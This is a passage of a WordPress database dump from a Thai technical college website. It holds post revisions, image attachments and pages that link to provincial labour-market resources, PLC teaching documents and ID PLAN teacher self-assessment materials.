(2996, 3, '2018-06-13 15:43:06', '2018-06-13 08:43:06', '', '13-6-2561 15-44-40', '', 'inherit', 'closed', 'closed', '', '13-6-2561-15-44-40', '', '', '2018-06-13 15:43:06', '2018-06-13 08:43:06', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg', 0, 'attachment', 'image/jpeg', 0),
(2997, 3, '2018-06-13 15:46:54', '2018-06-13 08:46:54', '', '13-6-2561 15-48-31', '', 'inherit', 'closed', 'closed', '', '13-6-2561-15-48-31', '', '', '2018-06-13 15:46:54', '2018-06-13 08:46:54', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(2998, 3, '2018-06-13 15:48:23', '2018-06-13 08:48:23', '', '13-6-2561 15-50-31', '', 'inherit', 'closed', 'closed', '', '13-6-2561-15-50-31', '', '', '2018-06-13 15:48:23', '2018-06-13 08:48:23', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(2999, 3, '2018-06-13 15:49:42', '2018-06-13 08:49:42', '<h4><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-13 15:49:42', '2018-06-13 08:49:42', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3001, 3, '2018-06-13 15:56:32', '2018-06-13 08:56:32', '', '13-6-2561 15-57-42', '', 'inherit', 'closed', 'closed', '', '13-6-2561-15-57-42', '', '', '2018-06-13 15:56:32', '2018-06-13 08:56:32', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg', 0, 'attachment', 'image/jpeg', 0),
(3002, 3, '2018-06-13 15:59:57', '2018-06-13 08:59:57', '<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-13 15:59:57', '2018-06-13 08:59:57', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3005, 3, '2018-06-14 10:40:33', '2018-06-14 03:40:33', '', '1', '', 'inherit', 'closed', 'closed', '', '1-5', '', '', '2018-06-14 10:40:33', '2018-06-14 03:40:33', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1-2.jpg', 0, 'attachment', 'image/jpeg', 0),
(3006, 3, '2018-06-14 10:41:05', '2018-06-14 03:41:05', '', '14-6-2561 10-42-35', '', 'inherit', 'closed', 'closed', '', '14-6-2561-10-42-35', '', '', '2018-06-14 10:41:05', '2018-06-14 03:41:05', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(3007, 3, '2018-06-14 10:46:42', '2018-06-14 03:46:42', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3004 aligncenter\" src=\"/wp-content/uploads/2018/06/map_rayong.jpg\" alt=\"\" width=\"637\" height=\"451\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-14 10:46:42', '2018-06-14 03:46:42', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3010, 4, '2018-06-18 12:16:48', '2018-06-18 05:16:48', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\">เอกสาร PLC</span></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-06-18 12:16:48', '2018-06-18 05:16:48', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(3011, 4, '2018-06-18 12:25:41', '2018-06-18 05:25:41', '<a href=\"https://drive.google.com/open?id=1lW8oixqRZof6WH_rEvYM8Snxi6ZmlFa7\">คู่มือการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=13WrTNllxwDsy213TD-xbdKK5sn5p5SiU\">Power Point แนวทางการขับเคลื่อน PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Nfv9L6rVsqe2qALDECwYUw-3s0k3imwB\">เอกสารการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1tkPQ3K7ZAmKMXZVa4FxLZ4LsD_OeIkn3\">ปฏิทินการจัดทำ PLC</a>', 'ชุมชนการเรียนรู้ทางวิชาชีพ (PLC)', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%8a%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%a3%e0%b8%b9%e0%b9%89%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b4%e0%b8%8a', '', '', '2018-06-18 13:09:18', '2018-06-18 06:09:18', '', 0, 'http://www.technicrayong.ac.th/?page_id=3011', 0, 'page', '', 0),
(3012, 4, '2018-06-18 12:25:41', '2018-06-18 05:25:41', '<a href=\"https://drive.google.com/open?id=1lW8oixqRZof6WH_rEvYM8Snxi6ZmlFa7\">คู่มือการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=13WrTNllxwDsy213TD-xbdKK5sn5p5SiU\">Power Point แนวทางการขับเคลื่อน PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Nfv9L6rVsqe2qALDECwYUw-3s0k3imwB\">เอกสารการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1vAI84TOUJhfj2Gzjfhtw9-nnewJfVhTb\">ปฏิทินการจัดทำ PLC</a>', 'ชุมชนการเรียนรู้ทางวิชาชีพ (PLC)', '', 'inherit', 'closed', 'closed', '', '3011-revision-v1', '', '', '2018-06-18 12:25:41', '2018-06-18 05:25:41', '', 3011, 'http://www.technicrayong.ac.th/3011-revision-v1/', 0, 'revision', '', 0),
(3014, 4, '2018-06-18 13:09:20', '2018-06-18 06:09:20', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\n\n<hr />\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%8A%E0%B8%B8%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A7%E0%B8%B4%E0%B8%8A/?preview_id=3011&preview_nonce=6c3bfba1dd&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">เอกสาร PLC</span></a></p>\n\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\n\n<hr />\n\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-autosave-v1', '', '', '2018-06-18 13:09:20', '2018-06-18 06:09:20', '', 1000, 'http://www.technicrayong.ac.th/1000-autosave-v1/', 0, 'revision', '', 0),
(3015, 4, '2018-06-18 12:27:27', '2018-06-18 05:27:27', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%8A%E0%B8%B8%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A7%E0%B8%B4%E0%B8%8A/?preview_id=3011&preview_nonce=6c3bfba1dd&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">เอกสาร PLC</span></a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-06-18 12:27:27', '2018-06-18 05:27:27', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(3016, 4, '2018-06-18 13:07:14', '2018-06-18 06:07:14', '<a href=\"https://drive.google.com/open?id=1lW8oixqRZof6WH_rEvYM8Snxi6ZmlFa7\">คู่มือการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=13WrTNllxwDsy213TD-xbdKK5sn5p5SiU\">Power Point แนวทางการขับเคลื่อน PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1Nfv9L6rVsqe2qALDECwYUw-3s0k3imwB\">เอกสารการจัดทำ PLC</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1tkPQ3K7ZAmKMXZVa4FxLZ4LsD_OeIkn3\">ปฏิทินการจัดทำ PLC</a>', 'ชุมชนการเรียนรู้ทางวิชาชีพ (PLC)', '', 'inherit', 'closed', 'closed', '', '3011-revision-v1', '', '', '2018-06-18 13:07:14', '2018-06-18 06:07:14', '', 3011, 'http://www.technicrayong.ac.th/3011-revision-v1/', 0, 'revision', '', 0),
(3017, 4, '2018-06-18 13:09:11', '2018-06-18 06:09:11', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%8A%E0%B8%B8%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A7%E0%B8%B4%E0%B8%8A/?preview_id=3011&preview_nonce=6c3bfba1dd&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">เอกสาร PLC</span></a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-06-18 13:09:11', '2018-06-18 06:09:11', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(3019, 4, '2018-06-18 13:13:32', '2018-06-18 06:13:32', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN)</h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-06-18 13:13:32', '2018-06-18 06:13:32', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(3020, 4, '2018-06-18 13:27:38', '2018-06-18 06:27:38', '<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือการจัดทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1i78UZuM82EPc22YeDHLPw47c1BljS-sF\">เอกสารประกอบการบรรยาย ID PLAN</a>\r\n\r\n<a href=\"https://course.kurupatana.ac.th/?pri_menu=course\">หลักสูตร สถาบันครุพัฒนา เพื่อใช้ประกอบการทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1bm46_TV5o27UJUlRDMkxFGQc7y_grgjK/view\">ตัวอย่างการประเมิน และ ID plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZsfbOQsN7IB6_m2kERnINqx_Gggtj8fd\">ปฏิทิน ID PLAN</a>\r\n<h3 class=\"wow fadeInDown text-center animated\" data-wow-duration=\"2s\"><a href=\"http://test-lteacher.otepc.go.th/\">เอกสารหลักเกณฑ์และวิธีการประเมินวิทยฐานะแนวใหม่ (ว 21/2560)</a></h3>', 'การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง (ID PLAN)', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88', '', '', '2018-06-18 13:29:49', '2018-06-18 06:29:49', '', 0, 'http://www.technicrayong.ac.th/?page_id=3020', 0, 'page', '', 0),
(3022, 4, '2018-06-18 13:27:38', '2018-06-18 06:27:38', '<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือการจัดทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1i78UZuM82EPc22YeDHLPw47c1BljS-sF\">เอกสารประกอบการบรรยาย ID PLAN</a>\r\n\r\n<a href=\"https://course.kurupatana.ac.th/?pri_menu=course\">หลักสูตร สถาบันครุพัฒนา เพื่อใช้ประกอบการทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1bm46_TV5o27UJUlRDMkxFGQc7y_grgjK/view\">ตัวอย่างการประเมิน และ ID plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZsfbOQsN7IB6_m2kERnINqx_Gggtj8fd\">ปฏิทิน ID PLAN</a>', 'การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง (ID PLAN)', '', 'inherit', 'closed', 'closed', '', '3020-revision-v1', '', '', '2018-06-18 13:27:38', '2018-06-18 06:27:38', '', 3020, 'http://www.technicrayong.ac.th/3020-revision-v1/', 0, 'revision', '', 0),
(3023, 4, '2018-06-18 13:30:00', '2018-06-18 06:30:00', '<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือการจัดทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1i78UZuM82EPc22YeDHLPw47c1BljS-sF\">เอกสารประกอบการบรรยาย ID PLAN</a>\r\n\r\n<a href=\"https://course.kurupatana.ac.th/?pri_menu=course\">หลักสูตร สถาบันครุพัฒนา เพื่อใช้ประกอบการทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1bm46_TV5o27UJUlRDMkxFGQc7y_grgjK/view\">ตัวอย่างการประเมิน และ ID plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZsfbOQsN7IB6_m2kERnINqx_Gggtj8fd\">ปฏิทิน ID PLAN</a>\r\n<h3 class=\"wow fadeInDown text-center animated\" data-wow-duration=\"2s\"><a href=\"http://test-lteacher.otepc.go.th/\">เอกสารหลักเกณฑ์และวิธีการประเมินวิทยฐานะแนวใหม่ (ว 21/2560)</a></h3>', 'การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง (ID PLAN)', '', 'inherit', 'closed', 'closed', '', '3020-autosave-v1', '', '', '2018-06-18 13:30:00', '2018-06-18 06:30:00', '', 3020, 'http://www.technicrayong.ac.th/3020-autosave-v1/', 0, 'revision', '', 0),
(3024, 3, '2018-06-18 13:29:01', '2018-06-18 06:29:01', '', 'ProvinceRayong2 copy', '', 'inherit', 'closed', 'closed', '', 'provincerayong2-copy', '', '', '2018-06-18 13:29:01', '2018-06-18 06:29:01', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ProvinceRayong2-copy.png', 0, 'attachment', 'image/png', 0),
(3025, 4, '2018-06-18 13:29:29', '2018-06-18 06:29:29', '<a href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือการจัดทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1i78UZuM82EPc22YeDHLPw47c1BljS-sF\">เอกสารประกอบการบรรยาย ID PLAN</a>\r\n\r\n<a href=\"https://course.kurupatana.ac.th/?pri_menu=course\">หลักสูตร สถาบันครุพัฒนา เพื่อใช้ประกอบการทำ ID PLAN</a>\r\n\r\n<a href=\"https://drive.google.com/file/d/1bm46_TV5o27UJUlRDMkxFGQc7y_grgjK/view\">ตัวอย่างการประเมิน และ ID plan</a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1ZsfbOQsN7IB6_m2kERnINqx_Gggtj8fd\">ปฏิทิน ID PLAN</a>\r\n<h3 class=\"wow fadeInDown text-center animated\" data-wow-duration=\"2s\"><a href=\"http://test-lteacher.otepc.go.th/\">เอกสารหลักเกณฑ์และวิธีการประเมินวิทยฐานะแนวใหม่ (ว 21/2560)</a></h3>', 'การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง (ID PLAN)', '', 'inherit', 'closed', 'closed', '', '3020-revision-v1', '', '', '2018-06-18 13:29:29', '2018-06-18 06:29:29', '', 3020, 'http://www.technicrayong.ac.th/3020-revision-v1/', 0, 'revision', '', 0),
(3026, 4, '2018-06-18 13:31:57', '2018-06-18 06:31:57', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\n\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\n\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: 